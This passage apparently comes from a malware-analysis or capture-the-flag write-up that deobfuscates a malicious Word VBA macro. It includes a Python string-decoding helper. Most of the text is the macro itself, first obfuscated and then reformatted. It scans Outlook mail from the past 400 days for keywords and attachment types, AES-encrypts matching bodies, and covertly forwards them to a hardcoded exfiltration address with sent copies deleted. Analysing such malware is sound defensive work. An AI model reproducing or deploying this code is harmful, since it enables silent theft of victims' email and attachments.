Dim tFWjedYCFp As String
KfBAtqXWVPbl = OFTngrKtymtIs.FileName
tFWjedYCFp = Split(KfBAtqXWVPbl, nkalPYSrDkoirG(Array(((13 ^ 21) + (0 ^ 1))), ((181 ^ 286) + (94 ^ 373))))((1 + 0))
Dim dPjnuzlcUPVn As Variant
For Each dPjnuzlcUPVn In RQRaVHWlfs
If (InStr((1 ^ 0), UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
sBtphCWmicZ = True
Else
sBtphCWmicZ = False
End If
Next
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Then
FSvAGmBKEpy = True
Else
FSvAGmBKEpy = False
End If
Next
If sBtphCWmicZ Or FSvAGmBKEpy Then
mvieYItXUPBIvj = True
Else
mvieYItXUPBIvj = False
End If
End Function

Public Function ovLKcDvvuvaxVc(ByVal wjzTImaDJSRTu As String) As Byte()
If Not SiTdrVDFDh Then vUyFpuvJDb
Dim wRIruiQpxDvw() As Byte: wRIruiQpxDvw = dpoZtAIxbLpJPI(wjzTImaDJSRTu)
Dim kDrJAVJbNwtC As Long: kDrJAVJbNwtC = UBound(wRIruiQpxDvw) + ((1 ^ 0) + (0 ^ 0))
If kDrJAVJbNwtC Mod 4 <> (0 ^ 0) Then Err.Raise vbObjectError, , ""
Do While kDrJAVJbNwtC > (0 + 0)
If wRIruiQpxDvw(kDrJAVJbNwtC - ((1 ^ 0) + (0 ^ 0))) <> Asc("=") Then Exit Do
kDrJAVJbNwtC = kDrJAVJbNwtC - 1
Loop
Dim HiRTbQaeOizeHo As Long: HiRTbQaeOizeHo = (kDrJAVJbNwtC * 3) \ 4
Dim dxYxQUpsKjOLmV() As Byte
ReDim dxYxQUpsKjOLmV((0 + 0) To HiRTbQaeOizeHo - (0 + (0 ^ 1))) As Byte
Dim IeVHLPDMGs As Long
Dim LBRLfYhwmCYTKQ As Long
Do While IeVHLPDMGs < kDrJAVJbNwtC
Dim uSdVVLRsgv As Byte: uSdVVLRsgv = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (1 ^ 0)
Dim ivfRQonHupynCi As Byte: ivfRQonHupynCi = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (0 ^ 1)
Dim DkJQeBghXpHn As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then DkJQeBghXpHn = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (0 ^ 1) Else DkJQeBghXpHn = Asc("A")
Dim YRUQTcrcxsrbaR As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then YRUQTcrcxsrbaR = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else YRUQTcrcxsrbaR = Asc("A")
If uSdVVLRsgv > (90 ^ 37) Or ivfRQonHupynCi > 127 Or DkJQeBghXpHn > (84 ^ 43) Or YRUQTcrcxsrbaR > (121 ^ 6) Then _
Err.Raise vbObjectError, , ""
Dim sLnJGqBWDN As Byte: sLnJGqBWDN = djMloUrgDXwtHC(uSdVVLRsgv)
Dim kXtArjueRudv As Byte: kXtArjueRudv = djMloUrgDXwtHC(ivfRQonHupynCi)
Dim ZDfzccazGV As Byte: ZDfzccazGV = djMloUrgDXwtHC(DkJQeBghXpHn)
Dim qObQrUydGx As Byte: qObQrUydGx = djMloUrgDXwtHC(YRUQTcrcxsrbaR)
If sLnJGqBWDN > 63 Or kXtArjueRudv > 63 Or ZDfzccazGV > 63 Or qObQrUydGx > (53 + (7 ^ 13)) Then _
Err.Raise vbObjectError, , ""
Dim IyuerXStwwqpzc As Byte: IyuerXStwwqpzc = (sLnJGqBWDN * 4) Or (kXtArjueRudv \ &H10)
Dim BvlunkHjhB As Byte: BvlunkHjhB = ((kXtArjueRudv And &HF) * &H10) Or (ZDfzccazGV \ (0 ^ 4))
Dim qMEiPPYHJDAhY As Byte: qMEiPPYHJDAhY = ((ZDfzccazGV And (2 + 1)) * &H40) Or qObQrUydGx
dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = IyuerXStwwqpzc: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = BvlunkHjhB: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = qMEiPPYHJDAhY: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
Loop
ovLKcDvvuvaxVc = dxYxQUpsKjOLmV
End Function

Private Sub vUyFpuvJDb()
Dim egVlWScuJR As Integer, KLMydQnxMZSOX As Integer
KLMydQnxMZSOX = ((0 ^ 0) + (0 ^ 0))
For egVlWScuJR = Asc("A") To Asc("Z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + ((0 ^ 1) + (0 ^ 0)): Next
For egVlWScuJR = Asc("a") To Asc("z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + (0 + 1): Next
For egVlWScuJR = Asc("0") To Asc("9"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
lxtmwrylodux(KLMydQnxMZSOX) = Asc("+"): KLMydQnxMZSOX = KLMydQnxMZSOX + (1 ^ 0)
lxtmwrylodux(KLMydQnxMZSOX) = Asc("/"): KLMydQnxMZSOX = KLMydQnxMZSOX + ((0 ^ 0) + (1 ^ 0))
For KLMydQnxMZSOX = (0 ^ 0) To (97 + (21 ^ 11)): djMloUrgDXwtHC(KLMydQnxMZSOX) = (169 ^ 86): Next
For KLMydQnxMZSOX = (0 ^ 0) To ((2 ^ 10) + 55): djMloUrgDXwtHC(lxtmwrylodux(KLMydQnxMZSOX)) = KLMydQnxMZSOX: Next
SiTdrVDFDh = True
End Sub
Private Function dpoZtAIxbLpJPI(ByVal wjzTImaDJSRTu As String) As Byte()
Dim kXtArjueRudv() As Byte: kXtArjueRudv = wjzTImaDJSRTu
Dim bguIwEekiNS As Long: bguIwEekiNS = (UBound(kXtArjueRudv) + (0 ^ 1)) \ (2 + 0)
If bguIwEekiNS = (0 ^ 0) Then dpoZtAIxbLpJPI = kXtArjueRudv: Exit Function
Dim ZDfzccazGV() As Byte
ReDim ZDfzccazGV(0 To bguIwEekiNS - 1) As Byte
Dim adaOdggiLnYx As Long
For adaOdggiLnYx = (0 + 0) To bguIwEekiNS - (1 ^ 0)
Dim egVlWScuJR As Long: egVlWScuJR = kXtArjueRudv((2 ^ 0) * adaOdggiLnYx) + ((153 ^ 56) + (38 ^ 121)) * CLng(kXtArjueRudv((2 ^ 0) * adaOdggiLnYx + (0 ^ 1)))
If egVlWScuJR >= (6 + 250) Then egVlWScuJR = Asc("?")
ZDfzccazGV(adaOdggiLnYx) = egVlWScuJR
Next
dpoZtAIxbLpJPI = ZDfzccazGV
End Function

Private Function nkalPYSrDkoirG(JOaTlVhEgWePay As Variant, VkjJlLFzskbVY As Integer)
Dim fvPLOtDYqRXxu As String
Dim PjJHmvDBocr() As Byte
PjJHmvDBocr = ovLKcDvvuvaxVc(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
fvPLOtDYqRXxu = ""
For KLMydQnxMZSOX = LBound(JOaTlVhEgWePay) To UBound(JOaTlVhEgWePay)
fvPLOtDYqRXxu = fvPLOtDYqRXxu & Chr(PjJHmvDBocr(KLMydQnxMZSOX + VkjJlLFzskbVY) ^ JOaTlVhEgWePay(KLMydQnxMZSOX))
Next
nkalPYSrDkoirG = fvPLOtDYqRXxu
End Function
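
The manual Xor replacement above, and the constant folding it prepares for, can be automated. The Python below is an added example, not part of the original write-up or the challenge files: it folds the constant Xor/+ arithmetic and, given the key bytes that nkalPYSrDkoirG reads from the document variable gtrxGyKtbDzUEDng, rewrites each decoder call as the string it produces. The helper names, the demo key and the "Sample" call are constructed for illustration; the real key is not shown on this page.

```python
import base64
import re
from functools import reduce
from operator import xor

# Innermost parenthesised group holding only integers joined by '+', '^' or Xor.
# The lookbehind leaves call/index parentheses such as Array(150) untouched.
CONST_GROUP = re.compile(
    r"(?<![\w.])\(\s*(\d+(?:\s*(?:\+|\^|\bXor\b)\s*\d+)*)\s*\)", re.IGNORECASE)
STRING_LITERAL = re.compile(r'("(?:[^"]|"")*")')

# One decoder call, and a chain of decoder calls joined with '&'.
_CALL = r"nkalPYSrDkoirG\(Array\([\d,\s]*\),\s*\d+\)"
CALL_CHAIN = re.compile(rf"{_CALL}(?:\s*&\s*{_CALL})*")
CALL_ARGS = re.compile(r"Array\(([\d,\s]*)\),\s*(\d+)\)")


def eval_const(expr: str) -> int:
    """Evaluate 'a + b Xor c' the way VBA does: '+' binds tighter than Xor."""
    terms = re.split(r"\^|\bXor\b", expr, flags=re.IGNORECASE)
    return reduce(xor, (sum(int(n) for n in term.split("+")) for term in terms))


def fold_line(line: str) -> str:
    """Collapse constant groups to one integer, skipping VBA string literals."""
    parts = STRING_LITERAL.split(line)      # odd indexes are the literals
    for i in range(0, len(parts), 2):
        previous = None
        while previous != parts[i]:         # repeat until nothing folds
            previous = parts[i]
            parts[i] = CONST_GROUP.sub(
                lambda m: str(eval_const(m.group(1))), parts[i])
    return "".join(parts)


def load_key(doc_variable_b64: str) -> bytes:
    """The macro's own decoder builds the standard Base64 alphabet
    (A-Z, a-z, 0-9, +, /), so the stock decoder gives the same bytes."""
    return base64.b64decode(doc_variable_b64)


def decode_call(values, offset: int, key: bytes) -> str:
    """Mirror nkalPYSrDkoirG: Chr(key(i + offset) Xor values(i))."""
    return "".join(chr(key[offset + i] ^ v) for i, v in enumerate(values))


def resolve_strings(line: str, key: bytes) -> str:
    """Fold constants, then replace each call chain with a quoted string."""
    def repl(match):
        text = "".join(
            decode_call([int(v) for v in args.split(",") if v.strip()],
                        int(offset), key)
            for args, offset in CALL_ARGS.findall(match.group(0)))
        return '"' + text.replace('"', '""') + '"'
    return CALL_CHAIN.sub(repl, fold_line(line))


if __name__ == "__main__":
    # Lines copied from the Stage 1 listing on this page.
    print(fold_line(
        "Private lxtmwrylodux((0 + (0 ^ 0)) To ((5 ^ 10) + (11 ^ 59))) As Byte"))
    print(fold_line(
        "nkalPYSrDkoirG(Array(((1 ^ 3) + 15)), ((0 ^ 7) + (5 ^ 12)))"))

    # Constructed key and constructed call, for demonstration only.
    demo_key = bytes((i * 7 + 3) % 256 for i in range(1024))
    print(resolve_strings(
        "CreateObject(nkalPYSrDkoirG(Array((83 ^ 3), 107, (100 + 24)), (0 ^ 0))"
        " & nkalPYSrDkoirG(Array(104, 115, 67), 3))", demo_key))
```

With the real document variable, pass `load_key(value)` as the key and run `resolve_strings` over every line of the extracted macro.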

Stage 2 Analysis


When I was done deobfuscating the XORed strings, the next step or Stage 2 in deobfuscating the VBA script was to format it so that it is readable to us. The methodology is to tabulate and separate functions, so that we can analyse what each function does in Stage 3.


Const exfil_address As String = "dph@whschool.com"
Private SiTdrVDFDh As Boolean
Private lxtmwrylodux(0 To 63) As Byte
Private djMloUrgDXwtHC(0 To 127) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
	Dim atBjGMlxGDau As Variant
	Dim IsNslKdUSos As Long
	Dim ULDvZWynDzG As String
	atBjGMlxGDau = Array(
		nkalPYSrDkoirG(Array(17), 16),
		nkalPYSrDkoirG(Array(150), 17), 
		nkalPYSrDkoirG(Array(25), 18), 
		nkalPYSrDkoirG(Array(234), 19), 
		nkalPYSrDkoirG(Array(63), 20), 
		nkalPYSrDkoirG(Array(200), 21), 
		nkalPYSrDkoirG(Array(223), 22), 
		nkalPYSrDkoirG(Array(50), 23), 
		nkalPYSrDkoirG(Array(95), 24), 
		nkalPYSrDkoirG(Array(66), 25), 
		nkalPYSrDkoirG(Array(212), 26), 
		nkalPYSrDkoirG(Array(74), 27), 
		nkalPYSrDkoirG(Array(101), 28), 
		nkalPYSrDkoirG(Array(21), 29), 
		nkalPYSrDkoirG(Array(41), 30), 
		nkalPYSrDkoirG(Array(221), 31), 
		nkalPYSrDkoirG(Array(141), 32), 
		nkalPYSrDkoirG(Array(240), 33), 
		nkalPYSrDkoirG(Array(136), 34), 
		nkalPYSrDkoirG(Array(157), 35), 
		nkalPYSrDkoirG(Array(255), 36), 
		nkalPYSrDkoirG(Array(173), 37), 
		nkalPYSrDkoirG(Array(139), 38), 
		nkalPYSrDkoirG(Array(120), 39), 
		nkalPYSrDkoirG(Array(3), 40), 
		nkalPYSrDkoirG(Array(164), 41), 
		nkalPYSrDkoirG(Array(18), 42), 
		nkalPYSrDkoirG(Array(209), 43), 
		nkalPYSrDkoirG(Array(181), 44), 
		nkalPYSrDkoirG(Array(62), 45), 
		nkalPYSrDkoirG(Array(129), 46), 
		nkalPYSrDkoirG(Array(212), 47), 
		nkalPYSrDkoirG(Array(27), 48), 
		nkalPYSrDkoirG(Array(234),49), 
		nkalPYSrDkoirG(Array(121), 50),
		nkalPYSrDkoirG(Array(173), 51), 
		nkalPYSrDkoirG(Array(150), 52), 
		nkalPYSrDkoirG(Array(94), 53),
		nkalPYSrDkoirG(Array(73), 54), 
		nkalPYSrDkoirG(Array(72), 55), 
		nkalPYSrDkoirG(Array(129), 56), 
		nkalPYSrDkoirG(Array(213), 57), 
		nkalPYSrDkoirG(Array(29), 58), 
		nkalPYSrDkoirG(Array(22), 59), 
		nkalPYSrDkoirG(Array(90), 60), 
		nkalPYSrDkoirG(Array(15), 61), 
		nkalPYSrDkoirG(Array(192), 62), 
		nkalPYSrDkoirG(Array(138), 63), 
		nkalPYSrDkoirG(Array(198), 64), 
		nkalPYSrDkoirG(Array(191), 65), 
		nkalPYSrDkoirG(Array(42), 66), 
		nkalPYSrDkoirG(Array(209), 67),
		nkalPYSrDkoirG(Array(253), 68), 
		nkalPYSrDkoirG(Array(119), 69), 
		nkalPYSrDkoirG(Array(45), 70), 
		nkalPYSrDkoirG(Array(40), 71), 
		nkalPYSrDkoirG(Array(98), 72), 
		nkalPYSrDkoirG(Array(131), 73), 
		nkalPYSrDkoirG(Array(93), 74), 
		nkalPYSrDkoirG(Array(160), 75), 
		nkalPYSrDkoirG(Array(150), 76), 
		nkalPYSrDkoirG(Array(178),77), 
		nkalPYSrDkoirG(Array(158), 78), 
		nkalPYSrDkoirG(Array(198), 79), 
		nkalPYSrDkoirG(Array(241), 80), 
		nkalPYSrDkoirG(Array(26), 81),
		nkalPYSrDkoirG(Array(82), 82), 
		nkalPYSrDkoirG(Array(242), 83), 
		nkalPYSrDkoirG(Array(10), 84), 
		nkalPYSrDkoirG(Array(32), 85))


	For IsNslKdUSos = 1 To JulhxRTJAtZ
	Randomize
	ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
	Next IsNslKdUSos
	FVaFfsygaGuUBB = ULDvZWynDzG
End Function

Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
	MTDPxqUeBtnHy = QvXdgzREtgivJc
	If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function

Function ahSFGkugmp(NfZjOnhlizlg)
	Dim BPFDRGiTpeffVc As String
	Dim IxqNKATnfrjL() As Byte
	Dim PIBNxhGCNMURDD As Object
	Dim MyKtJzYAsXy As Object
	Dim xothlNMzDN, JulhxRTJAtZ, QrbstMncnU As Integer
	Set PIBNxhGCNMURDD = CreateObject(
		nkalPYSrDkoirG(Array(65, 15, 169, 83, 186), 86) &
		nkalPYSrDkoirG(Array(160, 103, 128, 8, 139, 97, 250, 79, 95, 224, 170, 96, 245, 71, 103, 186, 44, 103, 158, 31, 232, 129, 82, 178, 18, 133, 115, 194, 192, 66, 183, 36, 182, 38, 237, 182, 196, 164, 237, 214, 214), 91))

	Set MyKtJzYAsXy = CreateObject(
		nkalPYSrDkoirG(Array(82, 13, 112, 27, 109, 196, 165, 198, 206, 116, 96, 74, 41, 247, 250), 132) & 

		nkalPYSrDkoirG(Array(9, 168, 144, 139, 171, 93, 234, 155, 173), 147))


	QrbstMncnU = PIBNxhGCNMURDD.InputBlockSize

	For xothlNMzDN = 0 To LenB(NfZjOnhlizlg) - 1 Step QrbstMncnU
		JulhxRTJAtZ = MTDPxqUeBtnHy(QrbstMncnU, UBound(NfZjOnhlizlg) - xothlNMzDN)
		IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
		BPFDRGiTpeffVc = BPFDRGiTpeffVc & MyKtJzYAsXy.GetString((IxqNKATnfrjL))
	Next
	ahSFGkugmp = BPFDRGiTpeffVc
End Function


Function uEfmNHGlYFaj(qcGjVkReTg)
	Dim MyKtJzYAsXy As Object
	Dim NfZjOnhlizlg() As Byte
	Dim ScMpMxoqdQ As Object
	Set MyKtJzYAsXy = CreateObject(
		nkalPYSrDkoirG(Array(186, 199, 237, 173, 11), 156) & 
		nkalPYSrDkoirG(Array(42, 147, 244, 227, 217, 20, 240, 189, 169, 218, 150, 218, 26, 120, 30, 247, 238, 39, 103), 161))

	Set ScMpMxoqdQ = CreateObject(
		nkalPYSrDkoirG(Array(41, 16, 195, 43, 54, 227, 171, 46, 45, 11, 114, 248, 18, 181, 226, 40, 111, 219, 130, 157, 226, 34, 206, 1, 40, 141, 7, 115, 214, 206, 151, 192, 206, 49, 69), 180) & 

		nkalPYSrDkoirG(Array(3, 190, 148, 200, 88, 140, 195, 140, 153, 176, 150, 241, 144), 215))

	NfZjOnhlizlg = MyKtJzYAsXy.GetBytes_4(qcGjVkReTg)
	uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function

Function ydcyecOpBU(dGArFkUqGLilS)
	Dim NdOBkdEXtS, wotFUFrkOjPBgY, zGRVIukttQSSEv, qdjbSxTRAtUT() As Byte
	Dim BFSsfIzKNm As String
	BFSsfIzKNm = FVaFfsygaGuUBB(32)
	Dim MyKtJzYAsXy, igFwXpLeArakc, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
	Dim kSNpGaWBeFRbpl() As Byte
	Set igFwXpLeArakc = CreateObject(
		nkalPYSrDkoirG(Array(128, 29, 106, 31, 232, 174, 73, 243, 91, 20, 179, 19), 228) & 
		
		nkalPYSrDkoirG(Array(138, 11, 119, 140, 67, 108, 195, 144, 46, 90, 18, 82, 93, 56, 103, 59, 186, 72, 24, 197, 227, 104, 22, 77, 130, 139, 110, 160, 3, 95, 112, 217), 240)
		)

	Set MyKtJzYAsXy = CreateObject(
			nkalPYSrDkoirG(Array(4, 92, 60, 38, 46, 49, 104, 151, 61, 108, 167, 130, 41, 233, 219, 136, 175, 129, 75, 197, 16, 100), 272) & 
			nkalPYSrDkoirG(Array(145, 123), 294)
		)
	igFwXpLeArakc.KeySize = 256
	igFwXpLeArakc.QrbstMncnU = 256
	igFwXpLeArakc.Mode = (1 + 0)
	igFwXpLeArakc.Key = CreateObject(
		nkalPYSrDkoirG(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296) & 
		nkalPYSrDkoirG(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(
			nkalPYSrDkoirG(Array(123, 135, 173, 251, 121, 152, 165, 131, 51, 106, 23, 231, 49, 113, 196, 188, 30, 231, 175, 225, 114, 173, 206, 191, 220, 210, 233, 94, 135), 320) & 
			nkalPYSrDkoirG(Array(149, 231, 36), 349)
			)

	igFwXpLeArakc.BFSsfIzKNm = CreateObject(
		nkalPYSrDkoirG(Array(87, 173, 86, 217, 37, 115, 66, 233, 171, 187, 26), 352) & 
		nkalPYSrDkoirG(Array(74, 174, 187, 135, 132, 67, 152, 67, 154, 20, 24, 39, 73), 363)).GetBytes_4(BFSsfIzKNm)

	qdjbSxTRAtUT = CreateObject(
		nkalPYSrDkoirG(Array(33, 167, 233, 97, 232, 150, 133, 152, 196, 112, 250, 209, 64, 92, 38, 253, 207, 119), 376) &
		nkalPYSrDkoirG(Array(106, 89, 107, 166, 255, 238), 394)).GetBytes_4(dGArFkUqGLilS)

	NdOBkdEXtS = igFwXpLeArakc.CreateEncryptor().TransformFinalBlock((qdjbSxTRAtUT), 0, UBound(qdjbSxTRAtUT))
	ydcyecOpBU = BFSsfIzKNm & nkalPYSrDkoirG(Array(87), 400) & ahSFGkugmp(NdOBkdEXtS)
End Function

Sub jexCsPbeKyQ()
	Dim whDjrLULSB
	whDjrLULSB = Array(
		nkalPYSrDkoirG(Array(145, 247, 232, 39, 180, 2, 15), 401) & 
		nkalPYSrDkoirG(Array(128), 408),
		nkalPYSrDkoirG(Array(61, 191, 159, 221, 67, 62), 409),
		nkalPYSrDkoirG(Array(22, 191, 72, 72, 243), 415), _
		nkalPYSrDkoirG(Array(81, 135, 219, 250, 98, 135, 226, 214, 50), 420) & 
		nkalPYSrDkoirG(Array(183), 429),
		nkalPYSrDkoirG(Array(31, 0, 15, 255, 100), 430) & 
		nkalPYSrDkoirG(Array(215, 232, 80, 157, 177, 249), 435),
		nkalPYSrDkoirG(Array(160, 48, 243, 84, 118, 78), 441) & 
		nkalPYSrDkoirG(Array(145, 36, 207, 244), 447), _
		nkalPYSrDkoirG(Array(114, 255, 135, 236, 183), 451) & 
		nkalPYSrDkoirG(Array(80, 81, 233, 118, 210, 137, 247, 9, 3, 206, 205, 36, 145, 18, 88, 178, 88), 456) 
	)
	Dim RQRaVHWlfs
	RQRaVHWlfs = Array( _
		nkalPYSrDkoirG(Array(36, 181, 114), 482),
		nkalPYSrDkoirG(Array(244, 131, 34), 485),
		nkalPYSrDkoirG(Array(134, 22, 44), 488), 
		nkalPYSrDkoirG(Array(213, 155, 210), 491),
		nkalPYSrDkoirG(Array(253, 154, 166), 494),
		nkalPYSrDkoirG(Array(60, 249), 497) & 
		nkalPYSrDkoirG(Array(92, 111, 53, 0, 14), 499),
		nkalPYSrDkoirG(Array(194, 32, 13), 504), 
		nkalPYSrDkoirG(Array(123, 29, 219), 507),
		nkalPYSrDkoirG(Array(105, 175, 240), 510),
		nkalPYSrDkoirG(Array(175, 185, 133, 24), 513),
		nkalPYSrDkoirG(Array(139, 22, 170, 55), 517),
		nkalPYSrDkoirG(Array(63, 233, 96, 74), 521),
		nkalPYSrDkoirG(Array(13, 180, 164), 525),
		nkalPYSrDkoirG(Array(118, 49, 48), 528),
		nkalPYSrDkoirG(Array(31, 86, 40, 33), 531),
		nkalPYSrDkoirG(Array(225, 47, 159, 30), 535),
		nkalPYSrDkoirG(Array(42, 144, 11), 539), 
		nkalPYSrDkoirG(Array(47, 54, 191), 542),
		nkalPYSrDkoirG(Array(223, 180, 184), 545),
		nkalPYSrDkoirG(Array(185, 34), 548),
		nkalPYSrDkoirG(Array(142, 197, 152), 550),
		nkalPYSrDkoirG(Array(244, 225, 208), 553)
	)

	Dim PtXoKYFkpFJGSc As Object
	Dim XstsppFkvZr As Object
	Dim emDROsRKEd As String
	Dim xfjOpXLsBTY As Object
	Dim FCMymRIsfbrg As Object
	Set PtXoKYFkpFJGSc = CreateObject(
		nkalPYSrDkoirG(Array(32, 125, 145, 71, 85, 255, 213, 53, 242, 143), 556) & 
		nkalPYSrDkoirG(Array(195, 175, 156, 62, 16, 209, 130, 159, 232), 566)
		)

	Set xfjOpXLsBTY = PtXoKYFkpFJGSc.GetNamespace(nkalPYSrDkoirG(Array(31, 42, 202, 165), 575))

	Set FCMymRIsfbrg = xfjOpXLsBTY.GetDefaultFolder(6).Items
	Dim KLMydQnxMZSOX As Integer
	Dim JxQPJFEkRSPeB As Boolean
	JxQPJFEkRSPeB = False
	Dim jUBrimEvzM As Boolean
	jUBrimEvzM = False
	Dim qeFHkrcXQwLmue As Date
	Dim kcINMJtMyDQgLL As Date
	Const daysToSearch As Integer = 400
	qeFHkrcXQwLmue = Date - daysToSearch
	kcINMJtMyDQgLL = Date
	Dim QmmdKXwuMa As Object
	For Each QmmdKXwuMa In FCMymRIsfbrg
	If QmmdKXwuMa.ReceivedTime >= qeFHkrcXQwLmue And QmmdKXwuMa.ReceivedTime <= kcINMJtMyDQgLL Then
	JxQPJFEkRSPeB = haPxSQQXjz(QmmdKXwuMa.body, QmmdKXwuMa.Subject, whDjrLULSB)
	If JxQPJFEkRSPeB Then
	Call ScsSqzpSPu(QmmdKXwuMa.body, QmmdKXwuMa.Subject)
	End If
	If QmmdKXwuMa.Attachments.Count > 0 Then
	Dim xZLUISSiXEpR As Integer
	For xZLUISSiXEpR = 1 To QmmdKXwuMa.Attachments.Count
	jUBrimEvzM = mvieYItXUPBIvj(QmmdKXwuMa.Attachments.Item(xZLUISSiXEpR), RQRaVHWlfs, whDjrLULSB)
	If jUBrimEvzM Then
	Call RkrRzFVxFXd(QmmdKXwuMa, QmmdKXwuMa.Subject)
	End If
	Next
	End If
	End If
	Next
	Set XstsppFkvZr = Nothing
	Set PtXoKYFkpFJGSc = Nothing
End Sub

Sub ScsSqzpSPu(IehgfWzjBPM As String, gjQiIlwvaI As String)
	Dim PtXoKYFkpFJGSc As Object
	Dim XstsppFkvZr As Object
	Dim emDROsRKEd As String
	Set PtXoKYFkpFJGSc = CreateObject(
		nkalPYSrDkoirG(Array(214, 93, 101, 103, 224, 201, 71, 86, 14), 579) & 
		nkalPYSrDkoirG(Array(56, 100, 181, 81, 89, 81, 248, 26, 166, 87), 588))
	Set XstsppFkvZr = PtXoKYFkpFJGSc.CreateItem(0)
	emDROsRKEd = IehgfWzjBPM
	On Error Resume Next
	With XstsppFkvZr
	.To = exfil_address
	.CC = nkalPYSrDkoirG(Array(), 614)
	.BCC = nkalPYSrDkoirG(Array(), 614)
	.Subject = nkalPYSrDkoirG(Array(145, 63, 241, 40, 79, 11, 206, 75, 203, 10, 99, 119, 157, 175, 96, 33, 112, 243, 190, 162, 12, 14, 51, 123, 202, 234, 175, 31, 235, 200, 195, 224, 147, 11), 614) & 
	nkalPYSrDkoirG(Array(101, 232, 121), 648) & 

	Environ(
		nkalPYSrDkoirG(Array(19, 248), 651) & 
		nkalPYSrDkoirG(Array(169, 114, 84, 92, 212, 112), 653)
		)

	.body = ydcyecOpBU(gjQiIlwvaI & emDROsRKEd)
	.DeleteAfterSubmit = True
	.Send
	End With
	On Error GoTo 0
	Set XstsppFkvZr = Nothing
	Set PtXoKYFkpFJGSc = Nothing
End Sub

Sub RkrRzFVxFXd(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
	Dim XstsppFkvZr As Object
	Set XstsppFkvZr = QmmdKXwuMa.Forward
	On Error Resume Next
	With XstsppFkvZr
	.To = exfil_address
	.CC = nkalPYSrDkoirG(Array(), 675)
	.BCC = nkalPYSrDkoirG(Array(), 675)
	.Subject = nkalPYSrDkoirG(Array(127, 220, 31, 150, 211, 131, 71, 43, 170, 236, 164, 166, 112, 17, 25, 122, 182, 170, 207, 20, 251, 16, 104, 20, 237, 154, 60, 176, 203, 32, 210, 178, 153, 140, 89, 37, 100, 244, 224), 675) &

	nkalPYSrDkoirG(Array(121, 159, 195, 255), 714) & 
	Environ(nkalPYSrDkoirG(Array(122, 116, 80, 109, 139, 170, 30), 718) &
	nkalPYSrDkoirG(Array(146), 725))

	.DeleteAfterSubmit = True
	.Send
	End With
	On Error GoTo 0
	Set XstsppFkvZr = Nothing
End Sub

Public Function haPxSQQXjz(IehgfWzjBPM As String, gjQiIlwvaI As String, whDjrLULSB As Variant) As Boolean
	haPxSQQXjz = False
	Dim YXeXnGWwCIuAtn As Variant
	For Each YXeXnGWwCIuAtn In whDjrLULSB
	If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > 0) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
	haPxSQQXjz = True
	Exit For
	Else
	haPxSQQXjz = False
	End If
	Next
End Function

Public Function mvieYItXUPBIvj(OFTngrKtymtIs As Variant, RQRaVHWlfs As Variant, whDjrLULSB As Variant) As Boolean
	mvieYItXUPBIvj = False
	Dim sBtphCWmicZ As Boolean
	sBtphCWmicZ = False
	Dim FSvAGmBKEpy As Boolean
	FSvAGmBKEpy = False
	Dim KfBAtqXWVPbl As String
	Dim tFWjedYCFp As String
	KfBAtqXWVPbl = OFTngrKtymtIs.FileName
	tFWjedYCFp = Split(KfBAtqXWVPbl, nkalPYSrDkoirG(Array(25), 726))1
	Dim dPjnuzlcUPVn As Variant
	For Each dPjnuzlcUPVn In RQRaVHWlfs
	If (InStr(1, UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
	sBtphCWmicZ = True
	Else
	sBtphCWmicZ = False
	End If
	Next
	Dim YXeXnGWwCIuAtn As Variant
	For Each YXeXnGWwCIuAtn In whDjrLULSB
	If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
	FSvAGmBKEpy = True
	Else
	FSvAGmBKEpy = False
	End If
	Next
	If sBtphCWmicZ Or FSvAGmBKEpy Then
	mvieYItXUPBIvj = True
	Else
	mvieYItXUPBIvj = False
	End If
End Function

